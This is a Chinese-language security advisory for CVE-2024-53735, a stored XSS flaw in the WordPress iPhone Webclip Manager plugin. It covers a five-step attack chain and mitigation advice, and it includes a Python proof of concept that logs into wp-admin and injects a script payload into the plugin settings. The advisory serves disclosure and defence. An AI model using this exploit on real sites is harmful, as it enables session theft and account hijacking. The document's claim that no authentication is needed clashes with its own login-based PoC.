CVE-2024-53735 WordPress iPhone Webclip Manager插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2024-53735

漏洞类型

存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress iPhone Webclip Manager插件 <= 0.5

漏洞概述

CVE-2024-53735是WordPress平台iPhone Webclip Manager插件中的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞由于插件在处理用户输入时未能正确对特殊字符进行转义和过滤，导致攻击者可以在网页中注入恶意JavaScript代码。所有使用该插件且版本在0.5及以下的WordPress站点均受影响。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于存储型XSS的恶意脚本会被永久保存在目标服务器上，所有访问受影响页面的用户都会受到攻击，具有较高的危害性和传播范围。CVSS评分7.1，属于高危漏洞，攻击复杂度低，无需特殊权限即可实施攻击，但需要用户交互（如访问特定页面）才能触发。

技术细节

iPhone Webclip Manager插件在处理Webclip配置参数时存在输入验证不足的问题。当管理员或用户配置iPhone Webclip时，插件直接将用户输入的字段值（如名称、URL等）存储到数据库，并在后续页面渲染时未进行充分的HTML转义处理。攻击者可以通过CSRF（跨站请求伪造）辅助或直接利用插件的API接口，在相关字段中注入包含JavaScript代码的恶意payload。当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本，从而实现会话劫持、敏感信息窃取等攻击。漏洞的利用需要诱导管理员或用户访问特定页面或触发特定操作来完成攻击链。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress站点是否安装并启用了iPhone Webclip Manager插件（版本<=0.5）

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload，如<script>alert(document.cookie)</script>

STEP 3

步骤3

通过CSRF攻击或直接访问插件管理后台，在Webclip配置字段（如名称、URL）中注入恶意payload

STEP 4

步骤4

恶意代码被存储到WordPress数据库中，当其他用户访问受影响的页面时触发执行

STEP 5

步骤5

攻击者通过注入的JavaScript窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-53735 PoC - Stored XSS in WordPress iPhone Webclip Manager
# Target: WordPress site with iPhone Webclip Manager plugin <= 0.5

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.local'

# Malicious XSS payload
xss_payload = '<script>alert(document.cookie)</script>'

# WordPress admin credentials
username = 'admin'
password = 'password'

def exploit_stored_xss():
    """Exploit CVE-2024-53735 Stored XSS vulnerability"""
    session = requests.Session()
    
    # Step 1: Login to WordPress admin
    login_url = f'{target}/wp-login.php'
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In'
    }
    
    try:
        resp = session.post(login_url, data=login_data, timeout=10)
        if 'wordpress_logged_in' not in session.cookies.get_dict():
            print('[-] Login failed')
            return False
        print('[+] Login successful')
        
        # Step 2: Inject XSS payload via plugin settings
        # Plugin admin page: /wp-admin/admin.php?page=iphone-webclip-manager
        admin_url = f'{target}/wp-admin/admin.php?page=iphone-webclip-manager'
        
        # XSS payload injection (stored in options)
        payload_data = {
            'iphone_webclip_name': xss_payload,
            'iphone_webclip_url': 'https://evil.example.com',
            'submit': 'Save Changes'
        }
        
        resp = session.post(admin_url, data=payload_data, timeout=10)
        print('[+] XSS payload injected')
        print(f'[+] Payload: {xss_payload}')
        print('[+] Visit admin page to trigger XSS')
        return True
        
    except requests.RequestException as e:
        print(f'[-] Request error: {e}')
        return False

if __name__ == '__main__':
    print(f'CVE-2024-53735 PoC - iPhone Webclip Manager Stored XSS')
    print(f'Target: {target}')
    exploit_stored_xss()

影响范围

iPhone Webclip Manager <= 0.5

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）暂时禁用或删除iPhone Webclip Manager插件；2）使用Web应用防火墙（WAF）规则拦截包含<script>标签的请求；3）限制管理员后台访问权限，仅允许受信任的IP地址访问；4）监控日志中的异常请求模式；5）考虑使用其他具有类似功能且安全性更好的插件替代。